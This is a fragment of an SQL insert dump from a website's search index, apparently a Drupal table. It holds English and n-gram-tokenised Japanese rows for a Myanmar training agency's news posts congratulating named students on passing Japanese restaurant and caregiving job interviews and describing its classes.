(118, 'ja', 'node_search', ' congrats aung thura congrats aung thura admin wed 6262024 1724 fri 3222024 900  おめで めでと でとう とうご うござ ござい ざいま います  aung thura  さん 特定外 定外食 レスト ストラ トラン 合格お 格おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(119, 'en', 'node_search', ' congrats thatoe aung congrats thatoe aung admin wed 6262024 1726 fri 3222024 900 congratulations  congratulations thatoe aung for passing tokutei gaishoku restaurant  ', 0),
(119, 'ja', 'node_search', ' congrats thatoe aung congrats thatoe aung admin wed 6262024 1729 fri 3222024 900  おめで めでと でとう とうご うござ ござい ざいま います  thatoe aung さん  tokutei gaishoku レスト ストラ トラン 合格お 格おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(120, 'en', 'node_search', ' boss s treatment to celebrate for the interview passed student boss s treatment to celebrate for the interview passed student admin wed 6262024 1723 sun 2252024 900 boss s treatment to celebrate for the interview passed student throughout this journey you have been an unwavering source of encouragement and mentorship their belief in my potential and their invaluable advice truly made a difference in preparing for this milestone their leadership style fosters a positive work environment where everyone feels valued and motivated to excel ', 0),
(120, 'ja', 'node_search', ' boss s treatment to celebrate for the interview passed student boss s treatment to celebrate for the interview passed student admin wed 6262024 1731 sun 2252024 900  面接合 接合格 合格を 格を祝 を祝う 祝う上 う上司 上司の 司の待 の待遇   この旅 の旅を 旅を通 を通し 通して あなた なたは たは揺 は揺る 揺るぎ るぎな ぎない ない励 い励ま 励まし ましと しと指 と指導 指導の 導の源 の源で 源でし でした 私の可 の可能 可能性 能性を 性を信 を信じ 信じて じてく てくだ くださ ださり 貴重な 重なア なアド アドバ ドバイ バイス イスを スをし をして してく てくだ くださ ださっ さった ったお たおか おかげ かげで この節 の節目 節目を 目を迎 を迎え 迎える える準 る準備 準備が 備がで ができ できま きまし ました 彼らの らのリ のリー リーダ ーダー ダーシ ーシッ シップ ップ プ ス スタ スタイ タイル イルは 誰もが もが評 が評価 評価さ 価され 卓越し 越した したモ たモチ モチベ チベー ベーシ ーショ ション ョンを ンを感 を感じ 感じら じられ られる れる前 る前向 前向き 向きな きな職 な職場 職場環 場環境 環境を 境を育 を育ん 育んで んでい でいま います  ', 0),
(121, 'en', 'node_search', ' congrats yee yee thant nay lin aung congrats yee yee thant nay lin aung admin wed 6262024 1731 fri 3222024 900 congratulations  congratulations yee yee thant nay lin aung for passing kaigo training job in japan  ', 0),
(121, 'ja', 'node_search', ' congrats yee yee thant nay lin aung congrats yee yee thant nay lin aung admin wed 6262024 1733 fri 3222024 900  おめで めでと でとう とうご うござ ござい ざいま います  yee yee thant  さんと  nay lin aung  さんが んが日 が日本 日本で 本での での介 の介護 介護職 護職研 職研修 研修に 修に合 に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(122, 'en', 'node_search', ' 1th batch internship in sushi resturtant 2122024  1th batch internship in sushi resturtant 2122024 admin wed 6262024 1733 wed 2212024 900 1th batch internship in sushi resturtant beyond the technical aspects the internship has also provided insight into japanese culture and traditions surrounding food from understanding the significance of fresh seasonal ingredients to the importance of respect and discipline in the kitchen every lesson has deepened my admiration for the rich heritage behind sushi cuisine  ', 0),
(122, 'ja', 'node_search', ' 1th batch internship in sushi resturtant 2122024  1th batch internship in sushi resturtant 2122024 admin wed 6262024 1737 wed 2212024 900  寿司レ 司レス レスト ストラ トラン ランで ンでの 1 期生イ 生イン インタ ンター ターン ーンシ ンシッ シップ   このイ のイン インタ ンター ターン ーンシ ンシッ シップ ップで プでは 技術的 術的な 的な面 な面だ 面だけ だけで けでな でなく 食を取 を取り 取り巻 り巻く 巻く日 く日本 日本の 本の文 の文化 文化や 化や伝 や伝統 伝統に 統につ につい ついて いても ても学 も学ぶ 学ぶこ ぶこと ことが とがで ができ できま きまし ました 新鮮な 鮮な旬 な旬の 旬の食 の食材 食材の 材の重 の重要 重要性 要性を 性を理 を理解 理解す 解する するこ ること ことか とから 厨房に 房にお におけ おける ける敬 る敬意 敬意と 意と規 と規律 規律の 律の重 の重要 重要性 要性を 性を理 を理解 理解す 解する するこ ること ことま とまで すべて べての てのレ のレッ レッス ッスン スンは 寿司料 司料理 料理の 理の背 の背後 背後に 後にあ にある ある豊 る豊か 豊かな かな伝 な伝統 伝統に 統に対 に対す 対する する私 る私の 私の賞 の賞賛 賞賛を 賛を深 を深め 深めま めまし ました  ', 0),
(123, 'en', 'node_search', ' congrats khin yu mon phyo thae ei phyu congrats khin yu mon phyo thae ei phyu admin wed 6262024 1735 sat 3162024 900 congratulations congratulations khin yu mon phyo thae ei phyu for passing tokutei gaishoku restaurant  ', 0),
(123, 'ja', 'node_search', ' congrats khin yu mon phyo thae ei phyu congrats khin yu mon phyo thae ei phyu admin wed 6262024 1738 sat 3162024 900  おめで めでと でとう とうご うござ ござい ざいま います  khin yu mon phyo  さんと  thae ei phyu  さんが tokutei gaishoku レスト ストラ トラン に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(124, 'en', 'node_search', ' congrats thura kyaw congrats thura kyaw admin wed 6262024 1740 sat 3162024 900 congratulations congratulations for thura kyaw for passing tokutei gaishoku restaurant  ', 0),
(124, 'ja', 'node_search', ' congrats thura kyaw congrats thura kyaw admin wed 6262024 1745 sat 3162024 900  おめで めでと でとう とうご うござ ござい ざいま います  thura kyaw  特定外 定外食 外食合 食合格 合格お 格おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(125, 'en', 'node_search', ' congrats may thingyan htun naw nay dar palu congrats may thingyan htun naw nay dar palu admin wed 6262024 1746 sat 3162024 900 congratulations  congratulations may thingyan htun naw nay dar paul for passing the tokutei gaishoku restaurant  ', 0),
(125, 'ja', 'node_search', ' congrats may thingyan htun naw nay dar palu congrats may thingyan htun naw nay dar palu admin wed 6262024 1749 sat 3162024 900  おめで めでと でとう とうご うござ ござい ざいま います  may thingyan htun  さんと  naw nay dar palu  さんが tokutei gaishoku レスト ストラ トラン に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(126, 'en', 'node_search', ' arrival at japan 1042024  arrival at japan 1042024 admin wed 6262024 1748 wed 4102024 900 arrival at japan 1042024  eight kaigo children who departed from myanmar on a tokutei visa on april 9 2024 will arrive in japan today april 10 2024 may you achieve great success in japan with your new endeavors  ', 0),
(126, 'ja', 'node_search', ' arrival at japan 1042024  arrival at japan 1042024 admin wed 6262024 1750 wed 4102024 900  日本到 本到着 1042024  2024 年 4 月 9 日にト にトク トクテ クテイ テイビ イビザ ビザで ザでミ でミャ ミャン ャンマ ンマー マーを ーを出 を出発 出発し 発した したカ たカイ カイゴ イゴの ゴの子 の子ど 子ども どもた もたち 8 名が 本日 2024 年 4 月 10 日に日 に日本 日本に 本に到 に到着 到着し 着しま します 日本で 本での での新 の新た 新たな たな活 な活躍 活躍が 躍が大 が大い 大いに いに期 に期待 期待さ 待され されま れます  ', 0),
(127, 'en', 'node_search', ' congrats yu wai phyo soe sandar htwe pann ei zaw congrats yu wai phyo soe sandar htwe pann ei zaw admin wed 6262024 1751 sat 3162024 900 congratulations  congrats yu wai phyo soe sandar htwe pann ei zaw for tokutei gaishoku restaurant  ', 0),
(127, 'ja', 'node_search', ' congrats yu wai phyo soe sandar htwe pann ei zaw congrats yu wai phyo soe sandar htwe pann ei zaw admin wed 6262024 1754 sat 3162024 900  おめで めでと でとう とうご うござ ござい ざいま います  congrats yu wai phyo   soe sandar htwe   pann ei zaw for tokutei gaishoku restaurant  ', 0),
(128, 'en', 'node_search', ' congrats for nan thae nu soe ei ei min hlaing mee mee htike pyae su su san congrats for nan thae nu soe ei ei min hlaing mee mee htike pyae su su san admin wed 6262024 1800 sat 3092024 900 congratulations  congratulations for nan thae nu soe   ei ei min   hlaing mee mee htike   pyae su su san    ', 0),
(128, 'ja', 'node_search', ' congrats for nan thae nu soe ei ei min hlaing mee mee htike pyae su su san congrats for nan thae nu soe ei ei min hlaing mee mee htike pyae su su san admin wed 6262024 1804 sat 3092024 900  おめで めでと でとう とうご うござ ござい ざいま います  congratulations for nan thae nu soe   ei ei min   hlaing mee mee htike   pyae su su san    ', 0),
(129, 'en', 'node_search', ' congrats kay thari toe may hla myo nila aung congrats kay thari toe may hla myo nila aung admin wed 6262024 1807 sat 3092024 900 congratulations  congratulations kay thari toe may hla myo nila aung  ', 0),
(129, 'ja', 'node_search', ' congrats kay thari toe may hla myo nila aung congrats kay thari toe may hla myo nila aung admin wed 6262024 1809 sat 3092024 900  おめで めでと でとう とうご うござ ござい ざいま います  congratulations kay thari toe may hla myo nila aung  ', 0),
(130, 'en', 'node_search', ' congrats congrats admin wed 6262024 1813 sat 3092024 900 congratulations  congratulations thant zin win htet lin aung ei kay zin moe set naing paing thu san hpone myat naing  ', 0),
(130, 'ja', 'node_search', ' congrats congrats admin wed 6262024 1817 sat 3092024 900  おめで めでと でとう とうご うござ ござい ざいま います  congratulations thant zin win htet lin aung ei kay zin moe set naing paing thu san hpone myat naing  ', 0),
(131, 'en', 'node_search', ' congrats to kyaw zin latt congrats to kyaw zin latt admin wed 6262024 1818 sat 3092024 900 congratulations congratulations to kyaw zin latt for passing interview for tokutei gaishoku restaurant  ', 0),
(131, 'ja', 'node_search', ' congrats to kyaw zin latt congrats to kyaw zin latt admin wed 6262024 1820 sat 3092024 900  おめで めでと でとう とうご うござ ござい ざいま います  kyaw zin latt  さんが tokutei gaishoku レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(132, 'en', 'node_search', ' congratulations yin may thu yamin shwe zin congratulations yin may thu yamin shwe zin admin thu 6272024 1425 wed 1242024 900 congratulations  congratulations to yin may thu yamin shwe zin for passsing the job interview for japan  ', 0),
(132, 'ja', 'node_search', ' congratulations yin may thu yamin shwe zin congratulations yin may thu yamin shwe zin admin thu 6272024 1523 wed 1242024 900  おめで めでと でとう とうご うござ ござい ざいま います  yin may thu さん   と  yamin shwe zin さん   が日本 日本の 本の就 の就職 就職面 職面接 面接に 接に合 に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(133, 'en', 'node_search', ' 2nd batch pratical class completion 2nd batch pratical class completion admin thu 6272024 1527 sat 4062024 900 2nd batch pratical class completion in the gaishoku practical class the japanese native instructor has meticulously instructed on the appropriate vocabulary etiquette and protocols for dining in japanese restaurantsthe inaugural gaishoku first batch classes led by instructors with over 30 years of experience in japan have concluded successfully today covering topics ranging from vegetable and meat nomenclature to kitchen operationswe extend our sincere gratitude on behalf of new comet to the dedicated teachers who impart knowledge in such a structured manner to our studentswith our successful training and preparation of interviewpassing students new comet encourages applications for job opportunities without delay  ', 0),
(133, 'ja', 'node_search', ' 2nd batch pratical class completion 2nd batch pratical class completion admin thu 6272024 1532 sat 4062024 900  第 2 バッチ ッチ実 チ実習 実習ク 習クラ クラス ラス終 ス終了   外食実 食実習 実習ク 習クラ クラス ラスで スでは 日本人 本人の 人のネ のネイ ネイテ イティ ティブ ィブ講 ブ講師 講師が 日本の 本のレ のレス レスト ストラ トラン ランで ンで食 で食事 食事を 事をす をする する際 る際の 際の適 の適切 適切な 切な語 な語彙 エチケ チケッ ケット 手順を 順を丁 を丁寧 丁寧に 寧に指 に指導 指導し 導しま しまし ました 日本で 30 年以上 以上の 上の経 の経験 経験を 験を持 を持つ 持つ講 つ講師 講師が 師が指 が指導 指導す 導する 野菜や 菜や肉 や肉の 肉の命 の命名 命名法 名法か 法から から厨 ら厨房 厨房業 房業務 業務ま 務まで まで幅 で幅広 幅広い 広いト いトピ トピッ ピック ックを クを扱 を扱っ 扱った った外 た外食 外食第 1 バッチ ッチの チの初 の初回 初回ク 回クラ クラス ラスが スが本 が本日 本日無 日無事 無事終 事終了 終了し 了しま しまし ました 体系的 系的に 的に知 に知識 知識を 識を学 を学生 学生に 生に伝 に伝え 伝えて えてく てくだ くださ ださる さる熱 る熱心 熱心な 心な講 な講師 講師の 師の方 々 に ニュー ューコ ーコメ コメッ メット ットを トを代 を代表 代表し 表して して心 て心か 心から から感 ら感謝 感謝申 謝申し 申し上 し上げ 上げま げます 面接に 接に合 に合格 合格し 格した した学 た学生 学生の 生のト のトレ トレー レーニ ーニン ニング ングと グと準 と準備 準備が 備が成 が成功 成功し 功した したニ たニュ ニュー ューコ ーコメ コメッ メット ットは 遅滞な 滞なく なく就 く就職 就職の 職の応 の応募 応募を 募を奨 を奨励 奨励し 励して してい ていま います  ', 0),
(134, 'en', 'node_search', ' congratulations to 7 peson for passing interview  congratulations to 7 peson for passing interview admin thu 6272024 1527 mon 1222024 900 congratulations  congratulations to ei shwe zin thae ko ko ei khin aung pyae paing lwin phyo ko ko hnin ei phyu yu yu nyein for passing interview for tokutei gaishoku restaurant to work at tokyo city japan  ', 0),
(134, 'ja', 'node_search', ' congratulations to 7 peson for passing interview  congratulations to 7 peson for passing interview admin thu 6272024 1536 mon 1222024 900  おめで めでと でとう とうご うござ ござい ざいま います   日本の 本の東 の東京 東京市 京市に 市にあ にある 特選外 選外食 の面接 面接に 接に合 に合格 合格し 格しま しまし ました さん ei shwe zin さん thae ko ko さん ei khin さん aung pyae paing さん lwin phyo ko ko さん hnin ei phyu さん yu yu nyein さん おめで めでと でとう とうご うござ ござい ざいま います  ', 0);
INSERT INTO `search_dataset` (`sid`, `langcode`, `type`, `data`, `reindex`) VALUES
(135, 'en', 'node_search', ' purpose of pratical training purpose of pratical training admin thu 6272024 1538 wed 4032024 900 purpose of pratical training at new comet agency we are dedicated to delivering practical japanese language education ensuring that our students upon passing restaurant interviews can authentically engage without the need for pretenseour experienced instructors facilitate learning through group activities and roleplaying scenarios in kitchen settings fostering practical skills among the childrenit brings me great joy to witness the diligence and dedication shown by our studentsopportunities in the restaurant sector are currently available and actively seeking applicantsnew comet agency strives to provide a supportive and seamless experience for our students thank you for placing your trust in new comet agency  ', 0),
(135, 'ja', 'node_search', ' purpose of pratical training purpose of pratical training admin thu 6272024 1541 wed 4032024 900  実習の 習の目 の目的   ニュー ューコ ーコメ コメッ メット ットエ トエー エージ ージェ ジェン ェンシ ンシー シーで ーでは 実用的 用的な 的な日 な日本 日本語 本語教 語教育 教育を 育を提 を提供 提供す 供する するこ ること ことに とに注 に注力 注力し 力して してお ており レスト ストラ トラン ランの ンの面 の面接 面接に 接に合 に合格 合格し 格した した生 た生徒 生徒が 見せか せかけ かけの けの必 の必要 必要も 要もな もなく 本気で 気で取 で取り 取り組 り組め 組める めるよ るよう ように うにし にして してい ていま います 経験豊 験豊富 豊富な 富なイ なイン インス ンスト ストラ トラク ラクタ クター ターが グルー ループ ープ活 プ活動 活動や 動やキ やキッ キッチ ッチン チンで ンでの でのロ のロー ロール ールプ ルプレ プレイ レイン イング ングの グのシ のシナ シナリ ナリオ リオを オを通 を通し 通して して学 て学習 学習を 習を促 を促進 促進し 子供た 供たち たちに ちに実 に実践 実践的 践的な 的なス なスキ スキル キルを ルを育 を育み 育みま みます 生徒の 徒の勤 の勤勉 勤勉さ 勉さと さと献 と献身 献身を 身を目 を目の 目の当 の当た 当たり たりに りにす にする するの るのは 私にと にとっ とって って大 て大き 大きな きな喜 な喜び 喜びで びです 現在 レスト ストラ トラン ラン部 ン部門 部門で 門での での機 の機会 機会が 会があ があり 積極的 極的に 的に応 に応募 応募者 募者を 者を募 を募集 募集し 集して してい ていま います ニュー ューコ ーコメ コメッ メット ットエ トエー エージ ージェ ジェン ェンシ ンシー シーは 生徒に 徒にサ にサポ サポー ポート ート的 ト的で 的でシ でシー シーム ームレ ムレス レスな スな体 な体験 体験を 験を提 を提供 提供す 供する するこ ること ことを とを目 を目指 目指し 指して してい ていま います ニュー ューコ ーコメ コメッ メット ットエ トエー エージ ージェ ジェン ェンシ ンシー シーを ーを信 を信頼 信頼し 頼して してい ていた いただ ただき ありが りがと がとう とうご うござ ござい ざいま います  ', 0),
(136, 'en', 'node_search', ' pratical nursing class pratical nursing class admin thu 6272024 1544 wed 2072024 900 pratical nursing class at new comet agency we provide comprehensive training not only for students who have successfully passed restaurant interviews but also for those who have passed kaigo interviews our approach ensures that all students guided by both nativespeaking and experienced instructors gain practical experience to thrive in their respective workplaces without encountering difficultiesupon completing the course students undergo practical training at elderly care centers where they acquire invaluable workplace experience with instruction from nativespeaking teachers our students gain confidence in japanese language proficiency eliminating any potential challenges new comet agency is committed to facilitating these arrangements for our students success  ', 0),
(136, 'ja', 'node_search', ' pratical nursing class pratical nursing class admin thu 6272024 1549 wed 2072024 900  実習看 習看護 看護ク 護クラ クラス   ニュー ューコ ーコメ コメッ メット ットエ トエー エージ ージェ ジェン ェンシ ンシー シーで ーでは レスト ストラ トラン ランの ンの面 の面接 面接に 接に合 に合格 合格し 格した した学 た学生 学生だ 生だけ だけで けでな でなく 介護の 護の面 の面接 面接に 接に合 に合格 合格し 格した した学 た学生 学生に 生にも にも包 も包括 包括的 括的な 的なト なトレ トレー レーニ ーニン ニング ングを グを提 を提供 提供し 供して してい ていま います 私たち たちの ちのア のアプ アプロ プロー ローチ ーチで チでは ネイテ イティ ティブ ィブス ブスピ スピー ピーカ ーカー カーと ーと経 と経験 経験豊 験豊富 豊富な 富なイ なイン インス ンスト ストラ トラク ラクタ クター ターの ーの両 の両方 両方の 方の指 の指導 指導に 導によ により すべて べての ての学 の学生 学生が 生がそ がそれ それぞ れぞれ ぞれの れの職 の職場 職場で 場で困 で困難 困難に 難に遭 に遭遇 遭遇す 遇する するこ ること ことな となく なく活 く活躍 活躍す 躍する するた るため ための めの実 の実践 実践的 践的な 的な経 な経験 経験を 験を積 を積む 積むこ むこと ことを とを保 を保証 保証し 証しま します コース ース修 ス修了 修了後 学生は 生は高 は高齢 高齢者 齢者介 者介護 介護施 護施設 施設で 設で実 で実習 実習を 習を受 を受け 貴重な 重な職 な職場 職場経 場経験 経験を 験を積 を積む 積むこ むこと ことが とがで ができ できま きます ネイテ イティ ティブ ィブス ブスピ スピー ピーカ ーカー カーの ーの教 の教師 教師の 師の指 の指導 指導に 導によ により 学生は 生は日 は日本 日本語 本語能 語能力 能力に 力に自 に自信 自信を 信を持 を持ち 潜在的 在的な 的な問 な問題 問題を 題を排 を排除 排除し 除しま します ニュー ューコ ーコメ コメッ メット ットエ トエー エージ ージェ ジェン ェンシ ンシー シーは 学生の 生の成 の成功 成功の 功のた のため ために めにこ にこれ これら れらの らの手 の手配 手配を 配を促 を促進 促進す 進する するこ ること ことに とに尽 に尽力 尽力し 力して してい ていま います  ', 0),
(137, 'en', 'node_search', ' congratulations to nang bwar kyi phray myar kaw myar  congratulations to nang bwar kyi phray myar kaw myar admin thu 6272024 1543 sat 1202024 900 congratulations  congratulations to nang bwar kyi phray myar kaw myar for passing the interview for tokutei kaigo to work at akita prefecture japan  ', 0),
(137, 'ja', 'node_search', ' congratulations to nang bwar kyi phray myar kaw myar  congratulations to nang bwar kyi phray myar kaw myar admin thu 6272024 1551 sat 1202024 900  おめで めでと でとう とうご うござ ござい ざいま います   おめで めでと でとう とうご うござ ござい ざいま います nang bwar kyi phray myar kaw myar 秋田県 田県で 県で働 で働く 働くた くため ための tokutei kaigo の面接 面接に 接に合 に合格 合格し 格しま しまし ました  ', 0),
(138, 'en', 'node_search', ' 1st batch speaking and pratical class completion 1st batch speaking and pratical class completion admin thu 6272024 1553 wed 2072024 900 1st batch speaking and pratical class completion at new comet agency candidates preparing for tokutei gaishoku restaurant interviews receive instruction from experienced teachers through small group activities and written exercises this approach ensures that successful candidates not only pass through new comet but also gain practical speaking skills and relevant experiencemoreover to alleviate language apprehension in foreign environments we offer small kaiwa conversation classes facilitated by native speakers to practice japanese accentscurrently our priority is to support interviewpassers by mitigating potential challenges they may encounter  ', 0),
(138, 'ja', 'node_search', ' 1st batch speaking and pratical class completion 1st batch speaking and pratical class completion admin thu 6272024 1555 wed 2072024 900  第 1 バッチ ッチの チのス のスピ スピー ピーキ ーキン キング ングと グと実 と実技 実技ク 技クラ クラス ラス修 ス修了   ニュー ューコ ーコメ コメッ メット エージ ージェ ジェン ェンシ ンシー シーで ーでは 特定外 定外食 レスト ストラ トラン 面接の 接の準 の準備 準備を 備をし をして してい ている いる候 る候補 候補者 補者は 小グル グルー ループ ープ活 プ活動 活動や 動や筆 や筆記 筆記練 記練習 練習を 習を通 を通じ 通じて じて経 て経験 経験豊 験豊富 豊富な 富な講 な講師 講師か 師から から指 ら指導 指導を 導を受 を受け 受けま けます このア のアプ アプロ プロー ローチ ーチに チによ により 合格者 格者は 者はニ はニュ ニュー ューコ ーコメ コメッ メット ットに トに合 に合格 合格す 格する するだ るだけ だけで けでな でなく 実践的 践的な 的なス なスピ スピー ピーキ ーキン キング スキル キルと ルと関 と関連 関連経 連経験 経験も 験も身 も身に 身に付 に付け 付ける けるこ ること ことが とがで ができ できま きます さらに 外国の 国の環 の環境 環境で 境での での言 の言語 言語不 語不安 不安を 安を軽 を軽減 軽減す 減する するた るため ために ネイテ イティ ティブ スピー ピーカ ーカー カーが ーが日 が日本 日本語 本語の 語のア のアク アクセ クセン セント ントを トを練 を練習 練習す 習する する少 る少人 少人数 人数制 数制の 制の会 の会話 会話ク 話クラ クラス ラスを スを提 を提供 提供し 供して してい ていま います 現在 私たち たちの ちの優 の優先 優先事 先事項 事項は 面接合 接合格 合格者 格者が 者が遭 が遭遇 遭遇す 遇する する可 る可能 可能性 能性の 性のあ のある ある潜 る潜在 潜在的 在的な 的な課 な課題 課題を 題を軽 を軽減 軽減し 減して してサ てサポ サポー ポート ートす トする するこ ること ことで とです  ', 0),
(139, 'en', 'node_search', ' congratulations hnin wah khaing lay lay naing  congratulations hnin wah khaing lay lay naing admin thu 6272024 1553 sat 1202024 900 congratulations  congratulations to hnin wah khaing lay lay naing for passing the interview for tokutei kaigo to work at akita prefecture japan  ', 0),
(139, 'ja', 'node_search', ' congratulations hnin wah khaing lay lay naing  congratulations hnin wah khaing lay lay naing admin thu 6272024 1558 sat 1202024 900  おめで めでと でとう とうご うござ ござい ざいま います  hnin wah khaing さん   と  lay lay naing さん   が 秋田県 田県で 県で働 で働く 働くた くため ための tokutei kaigo の面接 面接に 接に合 に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(140, 'en', 'node_search', ' 1st batch theoretical class for 15 students 1st batch theoretical class for 15 students admin thu 6272024 1559 mon 1152024 900 1st batch theoretical class for 15 students congratulations to all the children who have successfully passed the restaurant interview in the new year practical training will commence for 15 children based on the principles of success your hard work has paid off and we commend your achievements as you prepare to embark on this journey we encourage you to continue your dedication the classes are designed to equip you with essential workplace skills so attendance is crucial we look forward to seeing your continued progress and success in japan  ', 0),
(140, 'ja', 'node_search', ' 1st batch theoretical class for 15 students 1st batch theoretical class for 15 students admin thu 6272024 1608 mon 1152024 900 15 名の生 の生徒 生徒を 徒を対 を対象 対象と 象とし とした した第 1 バッチ ッチ理 チ理論 理論ク 論クラ クラス   レスト ストラ トラン ラン面 ン面接 面接に 接に合 に合格 合格し 格した したす たすべ すべて べての ての生 の生徒 生徒の 徒の皆 の皆さ 皆さん おめで めでと でとう とうご うござ ござい ざいま います 新年に 年には 成功の 功の原 の原則 原則に 則に基 に基づ 基づい づいた 15 名の生 の生徒 生徒を 徒を対 を対象 対象と 象とし とした した実 た実習 実習が 習が始 が始ま 始まり まりま ります 皆さん さんの んの努 の努力 努力は 力は報 は報わ 報われ 私たち たちは ちは皆 は皆さ 皆さん さんの んの成 の成果 成果を 果を称 を称賛 称賛し 賛しま します この旅 の旅に 旅に出 に出発 出発す 発する する準 る準備 準備を 備をし をしな しなが ながら 献身的 身的な 的な姿 な姿勢 姿勢を 勢を続 を続け 続けて けてく てくだ くださ ださい クラス ラスは 職場で 場で必 で必須 必須の 須のス のスキ スキル キルを ルを身 を身に 身に付 に付け 付ける けるよ るよう ように うに設 に設計 設計さ 計され されて れてい ている いるた るため 出席は 席は非 は非常 非常に 常に重 に重要 重要で 要です 日本で 本での での皆 の皆さ 皆さん さんの んの継 の継続 継続的 続的な 的な進 な進歩 進歩と 歩と成 と成功 成功を 功を期 を期待 期待し 待して してい ていま います  ', 0),
(141, 'en', 'node_search', ' congrats ei ei nyein thu zar aung bue myar shar  congrats ei ei nyein thu zar aung bue myar shar admin thu 6272024 1612 sat 1202024 900 congratulations  congratulations to ei ei nyein thu zar aung bue myar shar for passing the interview for tokutei kaigo at akita prefecture in japan  ', 0),
(141, 'ja', 'node_search', ' congrats ei ei nyein thu zar aung bue myar shar  congrats ei ei nyein thu zar aung bue myar shar admin thu 6272024 1616 sat 1202024 900  おめで めでと でとう とうご うござ ござい ざいま います  ei ei nyein さん    thu zar aung さん   bue myar shar さんが んが秋 が秋田 秋田県 田県の 県の特 の特定 特定介 定介護 介護の 護の面 の面接 面接に 接に合 に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(142, 'en', 'node_search', ' commencement of new comet language centre commencement of new comet language centre admin thu 6272024 1616 mon 1152024 900 commencement of new comet language centre the new year has begun with the introduction of a new n5 class who are already preparing for the july n4 exam classes will be held daily with regular assessments from monday to thursday one lesson will be conducted each day and over the weekend friday to sunday we plan to reinforce learning through popquiz sessions to keep students engaged and avoid monotony in homeworkas the school is affiliated with our agency completing the course eliminates the need for students to seek interviews independently current gaishoku candidates are equipped with essential knowledge through practical instruction by our teachers before their arrival in japanstudents are responsible for adhering to their daily study routines while we oversee the curriculum and facilitate their transition to japan  ', 0),
(142, 'ja', 'node_search', ' commencement of new comet language centre commencement of new comet language centre admin thu 6272024 1622 mon 1152024 900  新コメ コメッ メット ット語 ト語学 語学セ 学セン センタ ンター ターの ーの開 の開校   新年は 7 月の n4 試験に 験に向 に向け 向けて けて準 て準備 準備を 備を進 を進め 進めて めてい ている いる新 る新し 新しい n5 クラス ラスの スの導 の導入 導入で 入で始 で始ま 始まり まりま りまし ました 授業は 業は毎 は毎日 毎日行 日行わ 行われ 定期的 期的に 的に評 に評価 評価が 価が行 が行わ 行われ われま れます 月曜日 曜日か 日から から木 ら木曜 木曜日 曜日ま 日まで までは 1 日 1 レッス ッスン スンを ンを実 を実施 実施し 週末 金曜日 曜日か 日から から日 ら日曜 日曜日 は 生徒の 徒の興 の興味 興味を 味を維 を維持 維持し 宿題の 題の単 の単調 単調さ 調さを さを避 を避け 避ける けるた るため ために ポップ ップク プクイ クイズ セッシ ッショ ション ョンを ンを通 を通じ 通じて じて学 て学習 学習を 習を強 を強化 強化す 化する する予 る予定 予定で 定です 学校は 校は当 は当社 当社の 社の代 の代理 代理店 理店と 店と提 と提携 提携し 携して してい ている いるた るため コース ースを スを修 を修了 修了す 了する すると 生徒が 徒が独 が独自 独自に 自に面 に面接 面接を 接を受 を受け 受ける ける必 る必要 必要が 要がな がなく なくな くなり なりま ります 現在の 在の外 の外職 外職候 職候補 候補者 補者は 日本に 本に到 に到着 到着す 着する する前 る前に 当社の 社の教 の教師 教師に 師によ による よる実 る実践 実践的 践的な 的な指 な指導 指導を 導を通 を通じ 通じて じて必 て必須 必須の 須の知 の知識 知識を 識を身 を身に 身に付 に付け 付けま けます 生徒は 徒は毎 は毎日 毎日の 日の学 の学習 学習ル 習ルー ルーチ ーチン チンを ンを守 を守る 守る責 る責任 責任が 任があ があり 当社は 社はカ はカリ カリキ リキュ キュラ ュラム ラムを ムを監 を監督 監督し 日本へ 本への への移 の移行 移行を 行を支 を支援 支援し 援しま します  ', 0),
(143, 'en', 'node_search', ' congratulations hnin wai wai nwe thida khine  congratulations hnin wai wai nwe thida khine admin thu 6272024 1617 fri 1192024 900 congratulations  congratulations to hnin wai wai nwe thida khine for passing the interview for tokutei gaishoku restaurant to work at japan  ', 0),
(143, 'ja', 'node_search', ' congratulations hnin wai wai nwe thida khine  congratulations hnin wai wai nwe thida khine admin thu 6272024 1625 fri 1192024 900  おめで めでと でとう とうご うござ ござい ざいま います  hnin wai wai nwe さん   と  thida khine さん   が 日本で 本で働 で働く 働くた くため ための tokutei gaishoku レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(144, 'en', 'node_search', ' congratulations to aung zin oo htet wai aung than htun naing  congratulations to aung zin oo htet wai aung than htun naing admin thu 6272024 1626 fri 1192024 900 congratulations  congratulations to aung zin oo   than htun naing   htet wai aung for passing the interview in tokutei gaishoku restaurant to work at tokyo city japan  ', 0),
(144, 'ja', 'node_search', ' congratulations to aung zin oo htet wai aung than htun naing  congratulations to aung zin oo htet wai aung than htun naing admin thu 6272024 1635 fri 1192024 900  おめで めでと でとう とうご うござ ござい ざいま います  aung zin oo   than htun naing   htet wai aung  の 3 名が 東京市 京市に 市にあ にある ある特 る特定 特定外 定外食 レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 日本で 本で働 で働く 働くこ くこと ことに とにな になり なりま りまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(145, 'en', 'node_search', ' congratulations for getting coe congratulations for getting coe admin fri 6282024 1628 fri 6282024 400 congratulations for getting coe  congratulations kyaw zin latt for getting coe  ', 0),
(145, 'ja', 'node_search', ' congratulations for getting coe congratulations for getting coe admin fri 6282024 1632 fri 6282024 400 coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います  kyaw zin latt さん coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
